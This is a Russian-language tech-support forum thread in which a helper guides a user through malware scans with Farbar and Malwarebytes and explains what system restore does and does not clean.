	16.01.2024, 17:25 [ТС]	7
	Сообщение от Sandor Скачайте Farbar Recovery Scan Tool https://www.virustotal.com/gui... /detection Ноунейм АВ ругается. Буквально не долго просканировало, и такое впечатление, что зависло с надписью "Сканирование Системные ошибки: 244493", ошибок не прибавляется... и так почти 5 часов сканировало. Систему, на ножки поставило, ни диспетчер не запустишь, ни проводник: Explorer.exe: Ошибка при системном вызове C:\Users\Сергей Сергеевич\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\File Explorer.lnk: Нет приложения, сопоставленного с этим файлом для выполнения этого действия. Установите приложение или, если оно уже установлено, создайте связь на странице параметров приложений по умолчанию. Уведомление: Звук: Возникли проблемы со звуком? Откройте средство устранения неполадок со звуком. Короче видимо ваше приложение схавало всю оперативку и вообще всё что можно было. Пришлось сделать принудительную перезагрузку. Добавлено через 13 минут Sandor, ладно, бог с этими логами пока что. Это очень важно, возможно. Можете ответить на такой вопрос, пожалуйста? Вот если в установщике был вирус, и он заразил какую-то программу, уже имеющуюся на компе, к примеру WinRar, а потом я откатился к состоянию до установки, то WinRar останется заражённым? 0

@Sandor 21981 / 15761 / 3046 Регистрация: 08.10.2012 Сообщений: 64,054
	16.01.2024, 17:29	8
	Сообщение от Tommy Vercetti Ноунейм АВ ругается Не удивительно, т.к. программа часто обновляется и подобные ложные срабатывания допустимы. 5 часов, конечно, долго. Попробуйте ещё раз запустить и дождаться окончания скана. Добавлено через 1 минуту Сообщение от Tommy Vercetti WinRar останется заражённым? Если откат на контрольную точку средствами системы - да, останется. Если восстановление ранее созданного образа диска (сторонними программами типа Акронис) - нет. Добавлено через 48 секунд Сообщение от Sandor ещё раз запустить Предварительно всё остальное завершите по максимуму, в т.ч. защитное ПО. 1

@Sandor 21981 / 15761 / 3046 Регистрация: 08.10.2012 Сообщений: 64,054
	17.01.2024, 09:23	10
	Сообщение от Tommy Vercetti насколько я понимаю, Dr.Web Security Space же желательно отключать, чтобы АВ не конфликтовали и процесс сканирования не затягивался? Правильно понимаете. В Malwarebytes удалите (поместите в карантин) только Код Adware.OxyPumper, C:\$RECYCLE.BIN\S-1-5-21-2208526547-2125225514-2087499504-1001\$RWPVSR8.RAR, Проигнорировано пользователем, 5610, 1213367, 1.0.79698, , ame, , 8857BB623D29D22BDB98517C6A6EE197, 424C0EDA3F1C775A684807BF404E2D188CED585DA23969F338B1CB9A35A3B7A7 Логи Farbar не переделывали? Addition.txt неполный. 0

@Tommy Vercetti 1 / 1 / 1 Регистрация: 31.05.2014 Сообщений: 42
	17.01.2024, 11:32 [ТС]	11
	В Malwarebytes удалите (поместите в карантин) Да, раньше уже удалил, просто корзину не очистил. Это архив с тем самым вирусом, о котором упоминал в первом сообщении, на который я пароль забыл поставить вначале. Логи Farbar не переделывали? Нет. Неполные, вероятно из-за зависания и аварийной перезагрузки. Поставлю на сканирование ещё раз с отключенным Dr.Web. 0

@Sandor 21981 / 15761 / 3046 Регистрация: 08.10.2012 Сообщений: 64,054
	17.01.2024, 15:01	14
	Сообщение было отмечено Tommy Vercetti как решение Решение Сообщение от Tommy Vercetti очень много угроз обнаружил, и это по большей части, видимо, не рекламный ход разработчика или ложные срабатывания Интереса ради можете эти все его срабатывания проверить на virustotal. Торрент клиент, ссылки, маил.ру и яндекс, репаки Да, в каком-то смысле можно сказать, что использование всего этого (кроме браузеров) может привести к заражению. На мой взгляд - ничего критически опасного. 1

@Tommy Vercetti 1 / 1 / 1 Регистрация: 31.05.2014 Сообщений: 42
	17.01.2024, 19:15 [ТС]	15
	Да, я думаю так же. Пожалуй, хватит играть в "бой с тенью". искать мифические вирус. Остался бы какой майнер - грузил бы мою слабенькую машинку до предела, даже в сайлент-режиме. Вам спасибо. Помню вас с Тирексом ещё с былых времён. Радует, что вы до сих пор в строю, и помогаете человекам 1

Борьба с МАЙНЕРОМ превратилась в его увлекательный реверс-инженеринг

Решение